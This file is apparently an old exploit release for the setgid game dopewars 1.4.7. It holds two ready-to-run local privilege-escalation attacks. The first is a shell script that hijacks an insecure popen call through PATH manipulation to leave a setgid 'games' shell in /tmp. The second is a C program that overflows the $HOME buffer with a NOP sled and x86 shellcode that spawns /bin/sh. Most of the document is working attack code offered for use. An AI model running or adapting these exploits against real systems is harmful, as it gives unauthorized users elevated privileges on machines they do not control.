2dopewars_exploits.txt

`two security holes i found for local use in dopewars(1.4.7-current). dopewars  
is setgid=games. by: Vade79->v9[[email protected]].  
  
  
LOCAL VULNERABILITY #1: insecure popen call, a shell script can handle this.  
  
-- dopewars.sh start --  
  
#!/bin/sh  
# dopewars.sh(1.4.7): shell script by Vade79->[email protected]. gives gid=games.  
# insecure use of a popen call while setgid isn't good in any situation.  
  
DOPEWARS=`which dopewars`  
if [ "$DOPEWARS" ];   
then echo "[*] dopewars binary found: $DOPEWARS."  
else echo "[!] dopewars binary was not found, aborted.";exit  
fi  
CHECK=`ls -l $DOPEWARS | grep sr-`  
if [ "$CHECK" ];   
then echo "[*] dopewars found to be setgid, proceeding."  
else echo "[!] dopewars NOT found to be setgid, aborted.";exit  
fi  
PATH=/tmp:$PATH  
cp /bin/sh /tmp/gidsh  
echo 'main(){system("chgrp games /tmp/gidsh;chmod 2755 /tmp/gidsh");}'>/tmp/more.c  
cc /tmp/more.c -o /tmp/more  
cat <<X>/tmp/dopecmds  
help  
quit  
X  
dopewars -s</tmp/dopecmds 1>/dev/null 2>&1  
rm -f /tmp/more* /tmp/dopecmds  
CHECK=`ls -l /tmp/gidsh | grep sr-`  
if [ "$CHECK" ];   
then echo "[*] success, setgid shell is in: /tmp/gidsh."  
else echo "[!] failed, the setgid shell doesn't exist."  
fi  
  
-- dopewars.sh end --  
  
  
LOCAL VULNERABILITY #2: $HOME buffer overflow in versions 1.4.3-7(current).  
  
-- dopewars_bof.c start --  
  
/* (linux)dopewars[v1.4.3+] local buffer overflow, by v9[[email protected]].  
dopewars is SGID(=2755)=games by install(make install). this overflow is  
true for versions of dopewars 1.4.3 to 1.4.7(current).  
  
syntax: ./dopewars_bof [offset] [alignment(0-3)]  
./dopewars_bof -200 1  
  
the basic overlow(dopewars.c):  
--  
pt=getenv("HOME");  
if (!pt) return;  
if (strlen(pt) > 770) {  
sprintf(ConfigFile,"Home directory %s too long.",pt);  
ReportError(ConfigFile);  
return;  
}  
sprintf(ConfigFile,"%s/.dopewars",pt);  
--  
"the home directory is too long! so what? lets contiune anyways."  
  
note: even in the current version of dopewars(1.4.7) there appear to be some  
remote overflow possibilities from server->client(bof the client with  
a bogus server). you can even overflow the server just by simply  
sending a large string(eip=0x0..). i am just making a note of lots of  
unchecked buffers. also, $HOME is too common a overflow for this to  
occur. :) */  
  
#define PATH "/usr/local/bin/dopewars" // path to the dopewars program.  
#define GID 20 // group id of games.  
#define DEFAULT_OFFSET 200 // if no argument #1.  
#define DEFAULT_ALIGN 1 // if no argument #2.  
  
static char exec[]=  
"\xeb\x29\x5e\x31\xc0\xb0\x2e\x31\xdb\xb3"  
"\x00" // soon to be gid=games.  
"\xcd\x80\x89\x76\x08\x31\xc0\x88\x46\x07"  
"\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08"  
"\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40"  
"\xcd\x80\xe8\xd2\xff\xff\xff\x2f\x62\x69"  
"\x6e\x2f\x73\x68\x01"; // my usual shellcode for these situations :)  
  
long esp(void){__asm__("movl %esp,%eax");}  
int main(int argc,char **argv){  
char bof[800];  
int i,offset,align;  
long ret;  
if(argc>1){offset=atoi(argv[1]);}  
else{offset=DEFAULT_OFFSET;}  
if(argc>2){  
if(atoi(argv[2])>3||atoi(argv[2])<0){printf("%s: %s is an invalid alignment, use 0-3.\n",argv[0],argv[2]);exit(-1);}  
else{align=atoi(argv[2]);}  
}  
else{align=DEFAULT_ALIGN;}  
ret=(esp()-offset);  
printf("[ return addr: 0x%lx, offset: %d, alignment: %d. ]\n",ret,offset,align);  
exec[10]=GID;  
for(i=align;i<800;i+=4){*(long *)&bof[i]=ret;}  
for(i=0;i<(800-strlen(exec)-50);i++){*(bof+i)=0x90;}  
memcpy(bof+i,exec,strlen(exec));  
setenv("HOME",bof,1);  
if(execlp(PATH,"dopewars",0)){  
printf("%s: defined path %s did not execute correctly.\n",argv[0],PATH);  
exit(-1);  
}  
}  
  
-- dopewars_bof.c end --  
  
Vade79 -> [email protected] -> www.fakehalo.org.  
`